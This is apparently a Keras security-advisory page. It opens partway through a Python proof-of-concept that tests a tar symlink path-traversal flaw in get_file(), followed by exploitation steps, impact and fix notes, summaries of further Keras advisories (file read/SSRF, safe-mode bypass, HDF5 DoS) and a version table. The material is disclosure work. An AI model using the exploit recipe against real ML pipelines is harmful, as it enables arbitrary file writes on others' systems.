print(f"Cache: {cache_dir}")
print(f"Expected extraction: keras_cache/datasets/keras_dataset/")
print(f"Exploit target: exploit/keras_pwned.txt")
try:
    # The vulnerable Keras call
    extracted_path = get_file(
        "keras_dataset",
        url,
        cache_dir=str(cache_dir),
        extract=True,
    )
    print(f"✓ Keras extraction completed")
    print(f"✓ Returned path: {extracted_path}")
except Exception as e:
    print(f"❌ Keras extraction failed: {e}")
    import traceback
    traceback.print_exc()
# Vulnerability assessment
print(f"\n=== VULNERABILITY RESULTS ===")
final_exploit_files = [f.name for f in exploit_dir.iterdir()]
print(f"Files in exploit directory: {final_exploit_files}")
if "keras_pwned.txt" in final_exploit_files:
    print(f"\n🚨 KERAS VULNERABILITY CONFIRMED! 🚨")
    exploit_file = exploit_dir / "keras_pwned.txt"
    content = exploit_file.read_text()
    print(f"Exploit file created: {exploit_file}")
    print(f"Content:\n{content}")
    print(f"🔍 TECHNICAL DETAILS:")
    print(f"  • Keras uses tarfile.extractall() without filter parameter")
    print(f"  • PATH_MAX symlink resolution bug bypassed security checks")
    print(f"  • File created outside intended cache directory")
    print(f"  • Same vulnerability pattern as TensorFlow get_file()")
    print(f"\n📊 COMPARISON RESULTS:")
    print(f"  ✅ Python with filter='data': BLOCKED exploit")
    print(f"  ⚠️ Keras get_file(): ALLOWED exploit")
else:
    print(f"✅ No exploit files detected")
    print(f"Possible reasons:")
    print(f"  • Keras version includes security patches")
    print(f"  • Platform-specific path handling prevented exploit")
    print(f"  • Archive extraction path differed from expected")
# Show what Keras actually extracted (safely)
print(f"\n=== KERAS EXTRACTION ANALYSIS ===")
try:
    if 'extracted_path' in locals() and pathlib.Path(extracted_path).exists():
        keras_path = pathlib.Path(extracted_path)
        print(f"Keras extracted to: {keras_path}")
        # Safely list contents
        try:
            contents = [item.name for item in keras_path.iterdir()]
            print(f"Top-level contents: {contents}")
            # Count symlinks (indicates our exploit structure was created)
            symlink_count = 0
            for item in keras_path.iterdir():
                try:
                    if item.is_symlink():
                        symlink_count += 1
                except PermissionError:
                    continue
            print(f"Symlinks created: {symlink_count}")
            if symlink_count > 0:
                print(f"✓ PATH_MAX symlink chain was extracted")
        except PermissionError:
            print(f"Permission errors in extraction directory (expected with symlink corruption)")
except Exception as e:
    print(f"Could not analyze Keras extraction: {e}")
print(f"\n=== REMEDIATION ===")
print(f"To fix this vulnerability, Keras should use:")
print(f"```python")
print(f"tarfile.extractall(path, filter='data') # Safe")
print(f"```")
print(f"Instead of:")
print(f"```python")
print(f"tarfile.extractall(path) # Vulnerable")
print(f"```")
# Cleanup
print(f"\n=== CLEANUP ===")
try:
    os.unlink("keras_dataset.tgz")
    print(f"✓ Removed malicious tar file")
except OSError:
    pass
print("PoC completed!")
Environment Setup
- Python: 3.8+ (tested on multiple versions)
- Keras: standalone Keras or tf.keras (TensorFlow-bundled)
- Platform: Linux, macOS, Windows (path handling varies)
Exploitation Steps
- Create malicious tar archive with PATH_MAX symlink chain
- Host archive on accessible HTTP server
- Call keras.utils.get_file() with extract=True
- Observe directory traversal: files written outside the cache directory
Key Exploit Components
- Deep symlink chain: 16+ nested symlinks with long directory names
- PATH_MAX overflow: Final symlink path exceeding system limits
- Traversal payload: relative path traversal (../../../target/file)
- Legitimate disguise: archive contains valid-looking dataset files
Demonstration Results
Vulnerable behavior:
- Files extracted outside the intended cache_dir/datasets/ location
- Security filtering bypassed completely
- No error or warning messages generated
Expected secure behavior:
- Extraction blocked or confined to the cache directory
- Security warnings for suspicious archive contents
Impact
Vulnerability Classification
- Type: Directory Traversal / Path Traversal (CWE-22)
- Severity: High
- CVSS Components: Network accessible, no authentication required, impacts confidentiality and integrity
Who Is Impacted
Direct Impact:
- Applications using keras.utils.get_file() with extract=True
- Machine learning pipelines downloading and extracting datasets
- Automated ML training systems processing external archives
Attack Scenarios:
1. Malicious datasets: attacker hosts a compromised ML dataset
2. Supply chain: legitimate dataset repositories compromised
3. Model poisoning: extraction writes malicious files alongside training data
4. System compromise: configuration files or executables written to system directories
Affected Environments:
- Research environments downloading public datasets
- Production ML systems with automated dataset fetching
- Educational platforms using Keras for tutorials
- CI/CD pipelines training models with external data
Risk Assessment
High Risk Factors:
- Common usage pattern in ML workflows
- No user awareness of extraction security
- Silent failure mode (no warnings)
- Cross-platform vulnerability
Potential Consequences:
- Arbitrary file write on the target system
- Configuration file tampering
- Code injection via overwritten scripts
- Data exfiltration through planted files
- System compromise in containerized environments
Recommended Fix
Immediate Mitigation
Replace the vulnerable extraction code with:
# Secure implementation
if zipfile.is_zipfile(file_path):
    # Zip archive - implement similar filtering
    archive.extractall(path, members=filter_safe_paths(archive))
else:
    # Tar archive with proper security filter
    archive.extractall(path, members=filter_safe_paths(archive), filter="data")
Long-term Solution
- Add filter="data" parameter to all tarfile.extractall() calls
- Implement comprehensive path validation before extraction
- Add extraction logging for security monitoring
- Consider sandboxed extraction for untrusted archives
- Update documentation to warn about archive security risks
Backward Compatibility
The fix maintains backward compatibility: the filter parameter is available in Python 3.12+ (and was backported to security releases of 3.8 through 3.11), and filter="data" becomes the default behavior in Python 3.14.
References
- Python tarfile security documentation
- CVE-2007-4559 - Related tarfile vulnerability
- OWASP Path Traversal
Note: This was also reported via Huntr, but no response was received: https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4
Keras is vulnerable to arbitrary local file loading and Server-Side Request Forgery
- https://github.com/keras-team/keras/security/advisories/GHSA-qg93-c7p6-gg7f
- https://nvd.nist.gov/vuln/detail/CVE-2025-12058
- https://github.com/keras-team/keras/pull/21751
- https://github.com/keras-team/keras/commit/61ac8c1e51862c471dee7b49029c356f55531487
- https://www.cve.org/CVERecord?id=CVE-2025-12058
- https://github.com/advisories/GHSA-mq84-hjqx-cwf2
The Keras Model.load_model method, including when executed with the intended security mitigation safe_mode=True, is vulnerable to arbitrary local file loading and Server-Side Request Forgery (SSRF).
This vulnerability stems from the way the StringLookup layer is handled during model loading from a specially crafted .keras archive. The constructor for the StringLookup layer accepts a vocabulary argument that can specify a local file path or a remote file path.
Arbitrary Local File Read: An attacker can create a malicious .keras file that embeds a local path in the StringLookup layer's configuration. When the model is loaded, Keras will attempt to read the content of the specified local file and incorporate it into the model state (e.g., retrievable via get_vocabulary()), allowing an attacker to read arbitrary local files on the hosting system.
Server-Side Request Forgery (SSRF): Keras utilizes tf.io.gfile for file operations. Since tf.io.gfile supports remote filesystem handlers (such as GCS and HDFS) and HTTP/HTTPS protocols, the same mechanism can be leveraged to fetch content from arbitrary network endpoints on the server's behalf, resulting in an SSRF condition.
The security issue is that the feature allowing external path loading was not properly restricted by the safe_mode=True flag, which was intended to prevent such unintended data access.
Duplicate Advisory: Keras safe mode bypass vulnerability
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-c9rc-mg46-23w3. This link is maintained to preserve external references.
Original Description
A safe mode bypass vulnerability in the Model.load_model method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted .keras model archive.
Google Keras Allocates Resources Without Limits or Throttling in the HDF5 weight loading component
- https://nvd.nist.gov/vuln/detail/CVE-2026-0897
- https://github.com/keras-team/keras/pull/21880
- https://github.com/keras-team/keras/commit/7360d4f0d764fbb1fa9c6408fe53da41974dd4f6
- https://github.com/advisories/GHSA-xfhx-r7ww-5995
- https://github.com/keras-team/keras/pull/22081
- https://github.com/keras-team/keras/commit/f704c887bf459b42769bfc8a9182f838009afddb
Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.12.0 and 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape.
118 Other Versions
| Version | License | Security (known vulnerabilities) |
|---|---|---|
| 3.14.0 | Apache-2.0 | |
| 3.13.2 | Apache-2.0 | |
| 3.13.1 | Apache-2.0 | 2 |
| 3.13.0 | Apache-2.0 | 3 |
| 3.12.1 | Apache-2.0 | 1 |
| 3.12.0 | Apache-2.0 | 3 |
| 3.11.3 | Apache-2.0 | 6 |
| 3.11.2 | Apache-2.0 | 9 |
| 3.11.1 | Apache-2.0 | 9 |
| 3.11.0 | Apache-2.0 | 9 |
| 3.10.0 | Apache-2.0 | 11 |
| 3.9.2 | Apache-2.0 | 11 |
| 3.9.1 | Apache-2.0 | 11 |
| 3.9.0 | Apache-2.0 | 11 |
| 3.8.0 | Apache-2.0 | 13 |
| 3.7.0 | Apache-2.0 | 14 |
| 3.6.0 | Apache-2.0 | 14 |
| 3.5.0 | Apache-2.0 | 14 |
| 3.4.1 | Apache-2.0 | 14 |
| 3.4.0 | Apache-2.0 | 14 |
| 3.3.3 | Apache-2.0 | 14 |
| 3.3.2 | Apache-2.0 | 14 |
| 3.3.1 | Apache-2.0 | 14 |
| 3.3.0 | Apache-2.0 | 14 |
| 3.2.1 | Apache-2.0 | 14 |
| 3.2.0 | Apache-2.0 | 14 |
| 3.1.1 | Apache-2.0 | 14 |
| 3.1.0 | Apache-2.0 | 14 |
| 3.0.5 | Apache-2.0 | 14 |
| 3.0.4 | Apache-2.0 | 14 |
| 3.0.3 | Apache-2.0 | 14 |
| 3.0.2 | Apache-2.0 | 14 |
| 3.0.1 | Apache-2.0 | 14 |
| 3.0.0 | Apache-2.0 | 14 |
| 2.15.0 | Apache-2.0 | 6 |
| 2.15.0rc1 | Apache-2.0 | 6 |
| 2.15.0rc0 | Apache-2.0 | 6 |
| 2.14.0 | Apache-2.0 | 6 |
| 2.14.0rc0 | Apache-2.0 | 6 |
| 2.13.1 | Apache-2.0 | 6 |
| 2.13.1rc1 | Apache-2.0 | 6 |
| 2.13.1rc0 | Apache-2.0 | 6 |
| 2.12.0 | Apache-2.0 | 7 |
| 2.12.0rc1 | Apache-2.0 | 7 |
| 2.12.0rc0 | Apache-2.0 | 7 |
| 2.11.0 | Apache-2.0 | 7 |
| 2.11.0rc3 | Apache-2.0 | 7 |
| 2.11.0rc2 | Apache-2.0 | 7 |
| 2.11.0rc1 | Apache-2.0 | 7 |
| 2.11.0rc0 | Apache-2.0 | 7 |
